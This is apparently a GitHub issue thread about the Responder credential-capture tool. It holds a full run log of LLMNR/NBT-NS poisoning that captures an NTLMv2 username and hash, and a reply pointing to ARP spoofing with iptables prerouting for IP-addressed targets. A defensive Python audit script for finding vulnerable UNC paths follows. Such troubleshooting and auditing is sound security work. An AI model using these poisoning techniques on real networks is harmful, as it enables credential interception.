Closed MiMaz7707 closed 2 months ago
Who said it should?
If you want to catch those, you'll need to ARP with prerouting iptables rules.
Disruption will therefore occur.
On Tue, Jul 2, 2024, 8:31 PM MiMaz7707 @.***> wrote:
Hello,
It works fine if the victim uses a hostname in the UNC path, but it doesn't if the victim uses the server IP address or the FQDN.
```
responder -I eth0 -dwv

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (@.***)
  To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.117.200]
    Responder IPv6             [fe80::9024:b852:9137:c6f]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-OE0U3JW4FXX]
    Responder Domain Name      [WYT3.LOCAL]
    Responder DCE-RPC Port     [46345]

[+] Listening for events...

[*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[*] [NBT-NS] Poisoned answer sent to 192.168.117.10 for name S (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S
[*] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S
[*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[SMB] NTLMv2-SSP Client : fe80::4980:feb4:6fae:992d
[SMB] NTLMv2-SSP Username : MYLAB\test
[SMB] NTLMv2-SSP Hash : test::MYLAB:d2f4d55a1d326bac
```
LLMNR is a name resolution protocol; there is no name to resolve when you use an IP.
Hello,
I get it, so it needs to do a MiTM attack to get a response from victims that use an IP address.
Thanks.
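The point made in the replies, that a poisoner only sees clients that actually send a name query, can be turned into an audit of the UNC paths an environment uses. This is an added example, not part of the thread or of Responder; the sample paths are constructed, and treating multi-label names as DNS-resolved is an assumption based on the behaviour reported above.

```python
import ipaddress

IPV6_LITERAL_SUFFIX = ".ipv6-literal.net"  # Windows form for IPv6 addresses in UNC paths


def unc_host(path: str) -> str:
    """Return the server component of a UNC path such as \\\\srv\\share\\file."""
    if not path.startswith("\\\\"):
        raise ValueError(f"not a UNC path: {path!r}")
    host = path[2:].split("\\", 1)[0]
    if not host:
        raise ValueError(f"UNC path has no server part: {path!r}")
    return host


def is_ip_literal(host: str) -> bool:
    h = host.lower()
    if h.endswith(IPV6_LITERAL_SUFFIX):
        # fe80--1s4.ipv6-literal.net -> fe80::1 (zone index after "s" is dropped)
        h = h[: -len(IPV6_LITERAL_SUFFIX)].split("s", 1)[0].replace("-", ":")
    try:
        ipaddress.ip_address(h)
        return True
    except ValueError:
        return False


def classify(path: str) -> str:
    host = unc_host(path)
    if is_ip_literal(host):
        return "ip-literal"    # nothing to resolve, so no LLMNR/NBT-NS/mDNS query is sent
    if "." in host.rstrip("."):
        return "multi-label"   # assumption: FQDNs go to DNS; the thread saw no poisoning here
    return "single-label"      # may fall back to LLMNR/NBT-NS, the case poisoned in the log


def poisonable(paths):
    """Paths whose server name can end up in a multicast/broadcast name query."""
    return [p for p in paths if classify(p) == "single-label"]


# Constructed sample input, e.g. drive mappings collected from logon scripts.
SAMPLE = [
    r"\\S\share",
    r"\\192.168.117.10\share",
    r"\\fileserver.corp.example\share",
    r"\\fe80--1s4.ipv6-literal.net\share",
]
```

Paths reported by `poisonable()` are the ones to rewrite with an FQDN, or to cover by disabling LLMNR and NetBIOS name resolution on the clients.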